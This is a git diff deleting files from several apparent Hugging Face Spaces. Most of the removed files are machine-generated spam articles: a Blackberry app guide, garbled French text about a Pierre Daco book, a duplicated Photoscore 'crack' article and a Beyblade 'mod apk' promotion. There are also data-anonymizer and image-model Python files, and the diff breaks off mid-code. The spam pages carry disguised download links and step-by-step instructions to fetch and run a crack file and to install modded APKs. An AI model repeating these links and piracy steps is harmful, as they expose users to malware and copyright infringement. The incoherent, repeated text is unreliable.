diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Blackberry App Download The Secret to Boosting Your Productivity and Entertainment.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Blackberry App Download The Secret to Boosting Your Productivity and Entertainment.md deleted file mode 100644 index cca76f7a48bd02e0860b3d0b23303feb2ebc10c0..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Blackberry App Download The Secret to Boosting Your Productivity and Entertainment.md +++ /dev/null @@ -1,31 +0,0 @@ -
-

How to Download Blackberry Apps for Your Smartphone

-

Blackberry is one of the most popular smartphone brands in the world, with millions of loyal users who enjoy its features and security. However, if you want to make the most of your Blackberry device, you need to download some apps that can enhance your experience and productivity. In this article, we will show you how to download Blackberry apps for your smartphone in a few easy steps.

-

Step 1: Find the Blackberry App World

-

The Blackberry App World is the official app store for Blackberry devices, where you can find thousands of apps for various categories, such as games, social media, business, entertainment, and more. To access the Blackberry App World, you need to have a Blackberry ID and a data plan or Wi-Fi connection. You can either visit the website https://appworld.blackberry.com/webstore/ on your browser or download the app from https://www.blackberry.com/us/en/services/app-world/download on your computer and transfer it to your device via USB cable.

-

blackberry app download


Download File ⚹⚹⚹ https://byltly.com/2uKyQB



-

Step 2: Browse or Search for Apps

-

Once you have the Blackberry App World on your device, you can start browsing or searching for apps that suit your needs and preferences. You can use the categories or the featured sections to discover new and popular apps, or you can use the search bar to type in keywords or app names. You can also filter your results by price, rating, or compatibility.

-

Step 3: Download and Install Apps

-

When you find an app that you like, you can tap on it to see more details, such as description, screenshots, reviews, and permissions. If you decide to download it, you can tap on the "Download" or "Buy" button, depending on whether the app is free or paid. You may need to enter your Blackberry ID and password or your payment information if required. After that, the app will start downloading and installing on your device. You can see the progress on the notification bar or on the app page. Once the app is installed, you can launch it from your home screen or from the app list.

-

Conclusion

-

Downloading Blackberry apps for your smartphone is a simple and fun process that can open up a world of possibilities for your device. Whether you want to play games, chat with friends, work on documents, or watch videos, you can find an app for that on the Blackberry App World. Just follow the steps above and enjoy your new apps!

- -

How to Manage Your Blackberry Apps

-

After downloading and installing your Blackberry apps, you may want to manage them to keep your device organized and optimized. You can do this by using the Blackberry App World or the options menu on your device. Here are some tips on how to manage your Blackberry apps:

- -

How to Troubleshoot Your Blackberry Apps

-

Sometimes, your Blackberry apps may not work properly or cause some issues on your device. This can be due to various reasons, such as compatibility problems, bugs, corrupted files, low memory, etc. If you encounter any problems with your Blackberry apps, here are some steps you can take to troubleshoot them:

-

ddb901b051
-
-
\ No newline at end of file diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Comprendre Les Femmes Pierre Daco.pdf VERIFIED.md b/spaces/1gistliPinn/ChatGPT4/Examples/Comprendre Les Femmes Pierre Daco.pdf VERIFIED.md deleted file mode 100644 index d44a50faed1d323f116ac2221d4db31a93c0d7e7..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Comprendre Les Femmes Pierre Daco.pdf VERIFIED.md +++ /dev/null @@ -1,9 +0,0 @@ -
-

comprendre les femmes pierre daco a pr6sent6 linstrument a 'enregistrement, a savoir que pour autant qu'il s'agit de. pierre daco. comprendre les femmes et leur psychologie. geostatistics, geostatistics pdf, geostatistics course, geostatistics jobs, geostatistics modeling. comprendre les femmes pierre daco pdf download

-

Comprendre Les Femmes Pierre Daco.pdf


Downloadhttps://imgfil.com/2uxY1f



-

le groupe franais a cr, en outre, un rseau virtuel international ddi aux femmes, dont l'objectif dclar est de contribuer faire voluer les. l'histoire de la presse, tome iv, pages 288-313. le groupe franais a cr, en outre, un rseau virtuel international ddi aux femmes, dont l'objectif dclar est de contribuer faire voluer les. (top) get comprendre les femmes pierre daco.pdf (pdf). get comprendre les femmes pierre daco.pdf comprendre les femmes pierre daco emil au-delat. erwin k. lerchner. dalla schlesinger-borgen. a pr6sent6 linstrument a 'enregistrement, a savoir que pour autant qu'il s'agit de.

-

une femme. pour lui-mme. il faut comprendre qu'il est difficile d'associer des attitudes qui sont. actuellement. 90, dolo. dehors du champ de. l'inceste, l'homosexualité et. les troubles sexuels, ils ont. sens si dangereux. de l'homosexualité. la pornographie, la pornographie. il est. nous donnent. mais nous voil. douloureux. de comprendre le sens de la sexualité des femmes. de comprendre leur. et de leur. et de leur entretien. l'homosexualité nous aide a. comprendre les femmes. et il est. dangereux de la voir. pour cela. nous. pour servir d'exemple.. 3. pierre daco - psychothrapeute belge n en 1936 et dcd coxyde, belgique, en. etre. a.

-

femininity, the invention of the female. the many styles of expression of this creation is not a simple affair.. pierre daco. 9). comprendre. 9. comprendre les femmes. que les femmes. un des. e. nous ne pouvons.

-

899543212b
-
-
\ No newline at end of file diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Descargar Photoscore Ultimate 7 Crack 67.md b/spaces/1gistliPinn/ChatGPT4/Examples/Descargar Photoscore Ultimate 7 Crack 67.md deleted file mode 100644 index 303c0d6f3cfb514993829bb783400a3019360f3d..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Descargar Photoscore Ultimate 7 Crack 67.md +++ /dev/null @@ -1,102 +0,0 @@ - -

Descargar Photoscore Ultimate 7 Crack 67: A Powerful Software for Music Scanning and Notation

- -

If you are looking for a software that can scan and edit music scores, whether they are printed or handwritten, you might want to check out Descargar Photoscore Ultimate 7 Crack 67. This software is a comprehensive solution for music scanning and notation. It has many features and benefits that make it a reliable and efficient tool for musicians, composers and teachers.

- -

What is Descargar Photoscore Ultimate 7 Crack 67?

- -

Descargar Photoscore Ultimate 7 Crack 67 is a software package that was designed by Neuratron, a company that specializes in music software and solutions. It is a desktop application that can run on Windows and Mac OS platforms. It can scan and edit music scores, whether they are printed or handwritten. It can also support the latest scanners and formats, such as PDF, JPEG, TIFF and more.

-

Descargar Photoscore Ultimate 7 Crack 67


Download Filehttps://imgfil.com/2uxXZ8



- -

Descargar Photoscore Ultimate 7 Crack 67 has many features and functions that allow users to perform various tasks with music scores, such as:

- - - -

What are the benefits of Descargar Photoscore Ultimate 7 Crack 67?

- -

Descargar Photoscore Ultimate 7 Crack 67 has many benefits that make it a valuable software for music scanning and notation. Some of these benefits are:

- - - -

How to download and install Descargar Photoscore Ultimate 7 Crack 67?

- -

If you want to download and install Descargar Photoscore Ultimate 7 Crack 67 on your computer, you can follow these steps:

- -
    -
  1. Go to the official website of Neuratron and register for a free trial account.
  2. -
  3. Download the installation file for Descargar Photoscore Ultimate 7 Crack 67 from the website or from the link provided in the email confirmation.
  4. -
  5. Run the installation file and follow the instructions on the screen to install the software on your computer.
  6. -
  7. Download the crack file for Descargar Photoscore Ultimate 7 Crack 67 from the link provided in the email confirmation or from another source.
  8. -
  9. Copy the crack file and paste it into the installation folder of Descargar Photoscore Ultimate 7 Crack 67 on your computer.
  10. -
  11. Run the crack file and activate the software using the serial number provided in the email confirmation or from another source.
  12. -
- -

Congratulations! You have successfully downloaded and installed Descargar Photoscore Ultimate 7 Crack 67 on your computer. You can now start using the software to scan and edit your music scores.

- -

Conclusion

- -

Descargar Photoscore Ultimate 7 Crack 67 is a powerful software for music scanning and notation. It can scan and edit printed or handwritten music scores. It has many features and benefits that make it a reliable and efficient tool for musicians, composers and teachers. If you want to try out this software, you can download and install it on your computer using the steps provided above. We hope you found this article helpful and informative. Thank you for reading!

-

Descargar Photoscore Ultimate 7 Crack 67: A Powerful Software for Music Scanning and Notation

- -

If you are looking for a software that can scan and edit music scores, whether they are printed or handwritten, you might want to check out Descargar Photoscore Ultimate 7 Crack 67. This software is a comprehensive solution for music scanning and notation. It has many features and benefits that make it a reliable and efficient tool for musicians, composers and teachers.

- -

What is Descargar Photoscore Ultimate 7 Crack 67?

- -

Descargar Photoscore Ultimate 7 Crack 67 is a software package that was designed by Neuratron, a company that specializes in music software and solutions. It is a desktop application that can run on Windows and Mac OS platforms. It can scan and edit music scores, whether they are printed or handwritten. It can also support the latest scanners and formats, such as PDF, JPEG, TIFF and more.

-

- -

Descargar Photoscore Ultimate 7 Crack 67 has many features and functions that allow users to perform various tasks with music scores, such as:

- - - -

What are the benefits of Descargar Photoscore Ultimate 7 Crack 67?

- -

Descargar Photoscore Ultimate 7 Crack 67 has many benefits that make it a valuable software for music scanning and notation. Some of these benefits are:

- - - -

How to download and install Descargar Photoscore Ultimate 7 Crack 67?

- -

If you want to download and install Descargar Photoscore Ultimate 7 Crack 67 on your computer, you can follow these steps:

- -
    -
  1. Go to the official website of Neuratron and register for a free trial account.
  2. -
  3. Download the installation file for Descargar Photoscore Ultimate 7 Crack 67 from the website or from the link provided in the email confirmation.
  4. -
  5. Run the installation file and follow the instructions on the screen to install the software on your computer.
  6. -
  7. Download the crack file for Descargar Photoscore Ultimate 7 Crack 67 from the link provided in the email confirmation or from another source.
  8. -
  9. Copy the crack file and paste it into the installation folder of Descargar Photoscore Ultimate 7 Crack 67 on your computer.
  10. -
  11. Run the crack file and activate the software using the serial number provided in the email confirmation or from another source.
  12. -
- -

Congratulations! You have successfully downloaded and installed Descargar Photoscore Ultimate 7 Crack 67 on your computer. You can now start using the software to scan and edit your music scores.

- -

Conclusion

- -

Descargar Photoscore Ultimate 7 Crack 67 is a powerful software for music scanning and notation. It can scan and edit printed or handwritten music scores. It has many features and benefits that make it a reliable and efficient tool for musicians, composers and teachers. If you want to try out this software, you can download and install it on your computer using the steps provided above. We hope you found this article helpful and informative. Thank you for reading!

-

Conclusion

- -

Descargar Photoscore Ultimate 7 Crack 67 is a powerful software for music scanning and notation. It can scan and edit printed or handwritten music scores. It has many features and benefits that make it a reliable and efficient tool for musicians, composers and teachers. If you want to try out this software, you can download and install it on your computer using the steps provided above. We hope you found this article helpful and informative. Thank you for reading!

3cee63e6c2
-
-
\ No newline at end of file diff --git a/spaces/1phancelerku/anime-remove-background/Experience the Thrill of Beyblade Burst with MOD APK Version 11.0.4.md b/spaces/1phancelerku/anime-remove-background/Experience the Thrill of Beyblade Burst with MOD APK Version 11.0.4.md deleted file mode 100644 index e2638205d63129e5029c04d6d669e24106faeeba..0000000000000000000000000000000000000000 --- a/spaces/1phancelerku/anime-remove-background/Experience the Thrill of Beyblade Burst with MOD APK Version 11.0.4.md +++ /dev/null @@ -1,162 +0,0 @@ -
-

Beyblade Burst Mod Apk: A Guide for Fans of Spinning Tops

-

If you are a fan of spinning tops, you might have heard of Beyblade, a popular toy and anime franchise that has been around since the late 1990s. Beyblade is a game where players launch their customized tops, called Beys, into a stadium and try to knock out their opponents' Beys. The game has evolved over the years, with new generations of Beys, characters, and anime series. One of the latest iterations is Beyblade Burst, which has its own app that lets you create, customize, and battle your Beys online.

-

beyblade burst mod apk


Download ○○○ https://jinyurl.com/2uNMem



-

However, if you want to enjoy the full features and benefits of the game, you might want to try Beyblade Burst Mod Apk, a modified version of the app that gives you unlimited money, access to all Beys, and more. In this article, we will explain what Beyblade Burst is, what Beyblade Burst Mod Apk is, how to download and install it, and some tips and tricks to master the game. We will also share some reviews and ratings of the game, as well as a comparison table of Beyblade Burst and other similar games. Finally, we will answer some frequently asked questions about Beyblade Burst.

-

What is Beyblade Burst?

-

The origin and popularity of Beyblade

-

Beyblade is a toy line created by Takara Tomy in Japan in 1999. It was inspired by traditional spinning tops called beigoma, which were popular in Japan in the early 20th century. The name Beyblade comes from combining the words "beigoma" and "blade". The original toy line consisted of plastic or metal tops that had interchangeable parts, such as an energy layer, a forge disc, a performance tip, and an optional driver. Each part had different attributes that affected the performance of the top in battle.

-

Beyblade also spawned an anime series that followed the adventures of a group of young Bladers who competed in tournaments using their Beys. The anime series was adapted into various languages and aired in many countries around the world. The franchise also expanded into manga, video games, movies, merchandise, and more. As of 2020, Beyblade has sold over 500 million toys worldwide.

-

The features and gameplay of Beyblade Burst

-

Beyblade Burst is the third generation of the Beyblade franchise, which started in 2015. It introduced new features such as burst finishes, where a top can explode into pieces during battle; avatar attacks, where a top can unleash a powerful attack based on its energy layer; slingshock, where a top can ride on rails in the stadium; hypersphere, where a top can jump high in the air; speedstorm, where a top can create powerful wind currents; and dynamite battle, where a top can change its height during battle.

-

The gameplay of Beyblade Burst is similar to previous generations. Players launch their Beys into a stadium using a launcher device and try to knock out or burst their opponents' Beys. The winner is determined by how many points they score based on the outcome of the battle. For example, a ring out finish is worth one point, a burst finish is worth two points, and a survivor finish is worth one point if the opponent's top stops spinning first.

-

Beyblade Burst also has an app that allows players to scan their physical Beys and use them in the virtual world. The app has various modes, such as story mode, where players can follow the plot of the anime series; battle mode, where players can challenge other players online or offline; customization mode, where players can create and modify their Beys; and collection mode, where players can view and manage their Beys. The app also has a ranking system, where players can earn points and badges based on their performance.

-

beyblade burst mod apk unlimited money
-beyblade burst mod apk download latest version
-beyblade burst mod apk android 1
-beyblade burst mod apk hack
-beyblade burst mod apk revdl
-beyblade burst mod apk offline
-beyblade burst mod apk 10.2
-beyblade burst mod apk no ads
-beyblade burst mod apk all parts unlocked
-beyblade burst mod apk free shopping
-beyblade burst mod apk unlimited everything
-beyblade burst mod apk rexdl
-beyblade burst mod apk happymod
-beyblade burst mod apk 2023
-beyblade burst mod apk all beys unlocked
-beyblade burst mod apk unlimited coins and gems
-beyblade burst mod apk latest update
-beyblade burst mod apk online multiplayer
-beyblade burst mod apk obb
-beyblade burst mod apk pure
-beyblade burst mod apk unlimited spins
-beyblade burst mod apk an1
-beyblade burst mod apk all characters unlocked
-beyblade burst mod apk unlimited energy
-beyblade burst mod apk vip unlocked
-beyblade burst mod apk new version
-beyblade burst mod apk unlimited tickets
-beyblade burst mod apk apkpure
-beyblade burst mod apk all stadiums unlocked
-beyblade burst mod apk unlimited diamonds
-beyblade burst mod apk god mode
-beyblade burst mod apk 10.1.1
-beyblade burst mod apk for pc
-beyblade burst mod apk all codes unlocked
-beyblade burst mod apk unlimited qr codes
-beyblade burst mod apk 10.0.3
-beyblade burst mod apk mega.nz
-beyblade burst mod apk all levels unlocked
-beyblade burst mod apk unlimited scan codes
-beyblade burst mod apk mediafıre link

-

What is Beyblade Burst Mod Apk?

-

The benefits and drawbacks of using a modded version of the game

-

Beyblade Burst Mod Apk is a modified version of the official Beyblade Burst app that gives players some advantages and disadvantages. Some of the benefits of using Beyblade Burst Mod Apk are:

- -

However, there are also some drawbacks of using Beyblade Burst Mod Apk, such as:

- -

The steps to download and install Beyblade Burst Mod Apk

-

If you want to try Beyblade Burst Mod Apk, you need to follow these steps:

-
    -
  1. Find a reliable source: You need to find a trustworthy website that offers Beyblade Burst Mod Apk for download. You can search online or ask for recommendations from other players.
  2. -
  3. Download the file: You need to download the apk file from the website. Make sure you have enough storage space on your device and a stable internet connection.
  4. -
  5. Enable unknown sources: You need to enable unknown sources on your device settings. This will allow you to install apps from sources other than the Google Play Store.
  6. -
  7. Install the file: You need to locate the apk file on your device and tap on it to install it. Follow the instructions on the screen and wait for the installation to complete.
  8. -
  9. Launch the game: You need to open the game and enjoy playing with unlimited money and access to all Beys.
  10. -

What are some tips and tricks to master Beyblade Burst?

-

How to choose the best Bey for your battle style

-

One of the most important aspects of Beyblade Burst is choosing the right Bey for your battle style. There are four types of Beys: attack, defense, stamina, and balance. Each type has its own strengths and weaknesses, and can perform better or worse depending on the opponent and the stadium. Here are some general guidelines for choosing the best Bey for your battle style:

- -

How to use special tiles, skills, and avatar attacks

-

Beyblade Burst has some special features that can enhance your gameplay and give you an edge over your opponents. Some of these features are:

- -

How to participate in tournaments and leagues

-

Beyblade Burst also has some competitive modes that allow you to test your skills against other players from around the world. Some of these modes are:

-

What are some reviews and ratings of Beyblade Burst?

-

The positive and negative feedback from users and critics

-

Beyblade Burst has received mixed reviews and ratings from users and critics. Some of the positive feedback are:

- -

Some of the negative feedback are:

- -

A comparison table of Beyblade Burst and other similar games

-

Beyblade Burst is not the only game that involves spinning tops and battles. There are other similar games that you might want to check out. Here is a comparison table of Beyblade Burst and some of its competitors:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
GameDeveloperPlatformFeaturesRatings
Beyblade BurstHasbro Inc.Android, iOSCreate, customize, and battle your Beys online or offline; scan your physical Beys and use them in the virtual world; follow the story of the anime series; participate in tournaments and leagues; use special tiles, skills, and avatar attacks.4.1 out of 5 stars on Google Play; 4.6 out of 5 stars on App Store; 7.5 out of 10 on IGN.
Battle of Spin BladeBeyBlade Battle GamesAndroidChoose from over 100 Beys and battle against other players online or offline; customize your Beys with different parts and colors; use power-ups and special moves to win battles; collect coins and gems to unlock new Beys and items.4.0 out of 5 stars on Google Play.
Takara Tomy Beyblade Burst Superking B-173 Random Booster Vol.22 (Japan Import)Takara TomyNintendo SwitchPlay as your favorite characters from the anime series and use their Beys in battle; enjoy the realistic graphics and physics of the game; experience the new dynamite battle system that allows you to change your Bey's height during battle; compete with other players online or locally.4.7 out of 5 stars on Amazon Japan; 8 out of 10 on Nintendo Life.
BeyWarriors: BeyRaiderzNelvana Digital Inc.iOSRace your BeyRaiderz vehicles through different tracks and collect tokens; use your tokens to unleash powerful attacks on your opponents; customize your vehicles with different colors and decals; challenge your friends in multiplayer mode.3.9 out of 5 stars on App Store.
-

Conclusion and FAQs

-

A summary of the main points and a call to action

-

In conclusion, Beyblade Burst is a game that lets you create, customize, and battle your Beys online or offline. It is based on the popular toy and anime franchise that has been around since 1999. It has many features, such as burst finishes, avatar attacks, slingshock, hypersphere, speedstorm, and dynamite battle. However, if you want to enjoy the full benefits of the game, you might want to try Beyblade Burst Mod Apk, a modified version of the app that gives you unlimited money, access to all Beys, and more. However, you also need to be aware of the risks of using a modded version of the game, such as malware, ban, or lack of updates. You also need to follow some steps to download and install Beyblade Burst Mod Apk safely. Moreover, you can improve your skills by following some tips and tricks to choose the best Bey for your battle style, use special tiles, skills, and avatar attacks, and participate in tournaments and leagues. You can also compare Beyblade Burst with other similar games and read some reviews and ratings of the game. If you have any questions about Beyblade Burst, you can check out the FAQs section below.

-

If you are a fan of spinning tops and want to experience the thrill of Beyblade Burst, you should download the app today and start playing. You can also try Beyblade Burst Mod Apk if you want to have more fun and advantages. However, you should also be careful and responsible when using a modded version of the game. Remember, the most important thing is to enjoy the game and have fun with your Beys. Let it rip!

-

Five frequently asked questions and answers about Beyblade Burst

-

Here are some of the most common questions and answers about Beyblade Burst:

-
    -
  1. Q: Is Beyblade Burst safe for kids?
  2. -
  3. A: Yes, Beyblade Burst is safe for kids. It is rated E for Everyone by the ESRB and 4+ by the App Store. It does not contain any violence, gore, profanity, or inappropriate content. However, parents should still supervise their kids when they play the game online or use a modded version of the game.
  4. -
  5. Q: How can I scan my physical Beys into the app?
  6. -
  7. A: You can scan your physical Beys into the app by using your device's camera. You need to find the QR code on your Bey's energy layer or on the packaging and point your camera at it. The app will recognize the code and add the Bey to your collection.
  8. -
  9. Q: How can I get more coins and gems in the game?
  10. -
  11. A: You can get more coins and gems in the game by winning battles, completing challenges, watching ads, or buying them with real money. You can also use Beyblade Burst Mod Apk to get unlimited coins and gems for free.
  12. -
  13. Q: How can I contact the developers or report a problem with the game?
  14. -
  15. A: You can contact the developers or report a problem with the game by using the feedback option in the app's settings menu. You can also visit their website or social media pages for more information and support.
  16. -
  17. Q: How can I update the game or get the latest version of Beyblade Burst Mod Apk?
  18. -
  19. A: You can update the game or get the latest version of Beyblade Burst Mod Apk by checking for updates in the Google Play Store or App Store. You can also visit the website where you downloaded Beyblade Burst Mod Apk and look for new updates.
  20. -

401be4b1e0
-
-
\ No newline at end of file diff --git a/spaces/2hack2furious/anonymizer/modules.py b/spaces/2hack2furious/anonymizer/modules.py deleted file mode 100644 index eea97aba13209c9fe094c6ababb8ccd866708f92..0000000000000000000000000000000000000000 --- a/spaces/2hack2furious/anonymizer/modules.py +++ /dev/null @@ -1,160 +0,0 @@ -from itertools import combinations -import numpy as np -import pandas as pd - -SUPPORTED_TYPES = [".csv", ".json", ".xlsx"] - -def hello_world(): return "hello world!" - -def load_file(file): - """ - Takes a file given by Streamlit and loads into a DataFrame. - Returns a DataFrame, metadata, and result string. - - @param file: File uploaded into streamlit. - @rtype: tuple - @return: A tuple of format (pd.DataFrame, (str, str), str). - """ - df = None - - if file is None: return df, ("", ""), "" - - filename = file.name - extension = filename.split(".")[-1] - metadata = (filename, extension) - - import_functions = { - "csv": pd.read_csv, - "json": pd.read_json, - "xlsx": pd.read_excel - } - try: - reader = import_functions.get(extension, None) - if reader is None: - return df, metadata, f"Error: Invalid extension '{extension}'" - df = reader(file) - rows, columns = df.shape - return df, metadata, f"File '{filename}' loaded successfully.\nFound {rows} rows, {columns} columns." - except Exception as error: - return df, metadata, f"Error: Unable to read file '{filename}' ({type(error)}: {error})" - -def data_cleaner(df, drop_missing=False, remove_duplicates=True): - """ - Takes a DataFrame and removes empty and duplicate entries. - - @type df: pd.DataFrame - @param df: A DataFrame of uncleaned data. - @type drop_missing: bool - @param drop_missing: Determines if rows with any missing values are dropped ("any"), or just empty rows ("all"). - @type remove_duplicates: bool - @param remove_duplicates: Determines if duplicate rows are removed. - @rtype: pd.DataFrame - @return: A DataFrame with requested cleaning applied - """ - df = df.dropna(how="any" if drop_missing else "all") - if remove_duplicates: df = df.drop_duplicates() - return df - -def column_combinations(df, k): - return list(combinations(df.columns, k)) - -def k_redact(df, k): - kwise_combinations = column_combinations(df, k) - - for columns in kwise_combinations: - df_search = df.loc[:, columns] - sensitive_data = [ - (columns, key) - for key, value - in df_search.value_counts().to_dict().items() - if value == 1 - ] - if not sensitive_data: continue - for columns, values in sensitive_data: - for column, value in zip(columns, values): - df_search = df_search.loc[df[column] == value] - if df_search.shape[0] == 1: - for column in columns: - df_search[column] = None - - return df - -def sensitive_values(series, sensitivity_minimum): - return {key - for key, value - in series.value_counts().to_dict().items() - if value < sensitivity_minimum - } - -def drop_sensitive(series, sensitivity_minimum): - series.loc[series.isin(sensitive_values(series, sensitivity_minimum))] = None - -def bin_numeric(df, to_process, bin_size, sensitivity_minimum): - processed = set() - rows, _ = df.shape - num_bins = rows//bin_size - for column_name in to_process: - column = df[column_name] - if column.dtype.kind not in "biufc": continue - array = sorted(np.array(column)) - array_min, array_max = array[0], array[-1] - splits = [array_min] + list(np.array_split(array, num_bins)) + [array_max] - bins = [ - (np.min(split), np.max(split)) - for split - in (splits[i] for i in range(num_bins)) - ] - result = [None] * rows - for bin_min, bin_max in bins: - for i, value in enumerate(column): - if bin_min <= value <= bin_max: - result[i] = (bin_min, bin_max) - df[column_name] = result - drop_sensitive(df[column_name], sensitivity_minimum) - processed.add(column_name) - return df, to_process - processed - -def find_categorical(df, to_process, max_categorical_size, sensitivity_minimum): - processed = set() - for column_name in to_process: - column = df[column_name] - if column.nunique() <= max_categorical_size: - drop_sensitive(column, sensitivity_minimum) - processed.add(column_name) - return df, to_process - processed - -def redact(df, to_process, sensitivity_minimum): - processed = set() - for column_name in to_process: - column = df[column_name] - - is_object = column.dtype == object - if not is_object: continue - - # Check if any unique values exist, and redact them - drop_sensitive(column, sensitivity_minimum) - processed.add(column_name) - - return df, to_process - processed - -def anonymize(df, max_categorical_size, bin_size, sensitivity_minimum): - to_process = set(df.columns) - df, to_process = redact(df, to_process, sensitivity_minimum) - df, to_process = find_categorical(df, to_process, max_categorical_size, sensitivity_minimum) - df, to_process = bin_numeric(df, to_process, bin_size, sensitivity_minimum) - return df, to_process - -def data_anonymizer(df, k, max_categorical_size, bin_size, sensitivity_minimum): - start_dtypes = df.dtypes.to_dict() - df, unprocessed = anonymize(df, max_categorical_size, bin_size, sensitivity_minimum) - df = k_redact(df, k) - end_dtypes = df.dtypes.to_dict() - - # Type correction - for column in df.columns: - start_type, end_type = start_dtypes[column], end_dtypes[column] - if start_type == end_type: continue - if start_type.kind == "i" and end_type.kind == "f": - df[column] = df[column].astype("Int64") - - return df, unprocessed diff --git a/spaces/52Hz/SRMNet_thesis/model_arch/SRMNet_SWFF.py b/spaces/52Hz/SRMNet_thesis/model_arch/SRMNet_SWFF.py deleted file mode 100644 index 94e3f360369e0c9bc62c57cf5be1dafa73a20f4d..0000000000000000000000000000000000000000 --- a/spaces/52Hz/SRMNet_thesis/model_arch/SRMNet_SWFF.py +++ /dev/null @@ -1,265 +0,0 @@ -import torch -import torch.nn as nn -from WT import DWT, IWT -##---------- Basic Layers ---------- -def conv3x3(in_chn, out_chn, bias=True): - layer = nn.Conv2d(in_chn, out_chn, kernel_size=3, stride=1, padding=1, bias=bias) - return layer - -def conv(in_channels, out_channels, kernel_size, bias=False, stride=1): - return nn.Conv2d( - in_channels, out_channels, kernel_size, - padding=(kernel_size // 2), bias=bias, stride=stride) - -def bili_resize(factor): - return nn.Upsample(scale_factor=factor, mode='bilinear', align_corners=False) - -##---------- Basic Blocks ---------- -class UNetConvBlock(nn.Module): - def __init__(self, in_size, out_size, downsample): - super(UNetConvBlock, self).__init__() - self.downsample = downsample - self.block = SK_RDB(in_channels=in_size, growth_rate=out_size, num_layers=3) - if downsample: - self.downsample = PS_down(out_size, out_size, downscale=2) - - def forward(self, x): - out = self.block(x) - if self.downsample: - out_down = self.downsample(out) - return out_down, out - else: - return out - -class UNetUpBlock(nn.Module): - def __init__(self, in_size, out_size): - super(UNetUpBlock, self).__init__() - # self.up = nn.ConvTranspose2d(in_size, out_size, kernel_size=2, stride=2, bias=True) - self.up = PS_up(in_size, out_size, upscale=2) - self.conv_block = UNetConvBlock(in_size, out_size, False) - - def forward(self, x, bridge): - up = self.up(x) - out = torch.cat([up, bridge], dim=1) - out = self.conv_block(out) - return out - -##---------- Resizing Modules (Pixel(Un)Shuffle) ---------- -class PS_down(nn.Module): - def __init__(self, in_size, out_size, downscale): - super(PS_down, self).__init__() - self.UnPS = nn.PixelUnshuffle(downscale) - self.conv1 = nn.Conv2d((downscale**2) * in_size, out_size, 1, 1, 0) - - def forward(self, x): - x = self.UnPS(x) # h/2, w/2, 4*c - x = self.conv1(x) - return x - -class PS_up(nn.Module): - def __init__(self, in_size, out_size, upscale): - super(PS_up, self).__init__() - - self.PS = nn.PixelShuffle(upscale) - self.conv1 = nn.Conv2d(in_size//(upscale**2), out_size, 1, 1, 0) - - def forward(self, x): - x = self.PS(x) # h/2, w/2, 4*c - x = self.conv1(x) - return x - -##---------- Selective Kernel Feature Fusion (SKFF) ---------- -class SKFF(nn.Module): - def __init__(self, in_channels, height=3, reduction=8, bias=False): - super(SKFF, self).__init__() - - self.height = height - d = max(int(in_channels / reduction), 4) - - self.avg_pool = nn.AdaptiveAvgPool2d(1) - self.conv_du = nn.Sequential(nn.Conv2d(in_channels, d, 1, padding=0, bias=bias), nn.PReLU()) - - self.fcs = nn.ModuleList([]) - for i in range(self.height): - self.fcs.append(nn.Conv2d(d, in_channels, kernel_size=1, stride=1, bias=bias)) - - self.softmax = nn.Softmax(dim=1) - - def forward(self, inp_feats): - batch_size, n_feats, H, W = inp_feats[1].shape - - inp_feats = torch.cat(inp_feats, dim=1) - inp_feats = inp_feats.view(batch_size, self.height, n_feats, inp_feats.shape[2], inp_feats.shape[3]) - - feats_U = torch.sum(inp_feats, dim=1) - feats_S = self.avg_pool(feats_U) - feats_Z = self.conv_du(feats_S) - - attention_vectors = [fc(feats_Z) for fc in self.fcs] - attention_vectors = torch.cat(attention_vectors, dim=1) - attention_vectors = attention_vectors.view(batch_size, self.height, n_feats, 1, 1) - - attention_vectors = self.softmax(attention_vectors) - feats_V = torch.sum(inp_feats * attention_vectors, dim=1) - - return feats_V - -##---------- Selective Wavelet Feature Fusion (SKFF) ---------- -class SWFF(nn.Module): - def __init__(self, in_channels, height=3, reduction=8, bias=False): - super(SWFF, self).__init__() - - self.height = height - d = max(int(in_channels / reduction), 4) - - self.avg_pool = nn.AdaptiveAvgPool2d(1) - self.wav_conv_du = nn.Sequential(nn.Conv2d(4*in_channels, d, 1, padding=0, bias=bias), nn.PReLU()) - self.dwt = DWT() - self.iwt = IWT() - self.fcs = nn.ModuleList([]) - for i in range(self.height): - self.fcs.append(nn.Conv2d(d, in_channels*4, kernel_size=1, stride=1, bias=bias)) - - self.softmax = nn.Softmax(dim=1) - - def forward(self, inp_feats): - batch_size, n_feats, H, W = inp_feats[0].shape - wavelet_rep = [(self.dwt(each)) for each in inp_feats] - - wav_inp_feats = torch.cat(wavelet_rep, dim=1) - wav_inp_feats = wav_inp_feats.view(batch_size, self.height, n_feats*4, wav_inp_feats.shape[2], wav_inp_feats.shape[3]) - - inp_feats = torch.cat(inp_feats, dim=1) - inp_feats = inp_feats.view(batch_size, self.height, n_feats, inp_feats.shape[2], inp_feats.shape[3]) - - feats_U = torch.sum(wav_inp_feats, dim=1) - feats_S = self.avg_pool(feats_U) - feats_Z = self.wav_conv_du(feats_S) - - attention_vectors = [self.avg_pool(self.iwt(fc(feats_Z))) for fc in self.fcs] - attention_vectors = torch.cat(attention_vectors, dim=1) - attention_vectors = attention_vectors.view(batch_size, self.height, n_feats, 1, 1) - - attention_vectors = self.softmax(attention_vectors) - feats_V = torch.sum(inp_feats * attention_vectors, dim=1) - - return feats_V - -##---------- Dense Block ---------- -class DenseLayer(nn.Module): - def __init__(self, in_channels, out_channels, I): - super(DenseLayer, self).__init__() - self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=3 // 2) - self.relu = nn.ReLU(inplace=True) - self.sk = SKFF(out_channels, height=2, reduction=8, bias=False) - - def forward(self, x): - x1 = self.relu(self.conv(x)) - # output = torch.cat([x, x1], 1) # -> RDB - output = self.sk((x, x1)) - return output - -##---------- Selective Kernel Residual Dense Block (SK-RDB) ---------- -class SK_RDB(nn.Module): - def __init__(self, in_channels, growth_rate, num_layers): - super(SK_RDB, self).__init__() - self.identity = nn.Conv2d(in_channels, growth_rate, 1, 1, 0) - self.layers = nn.Sequential( - *[DenseLayer(in_channels, in_channels, I=i) for i in range(num_layers)] - ) - self.lff = 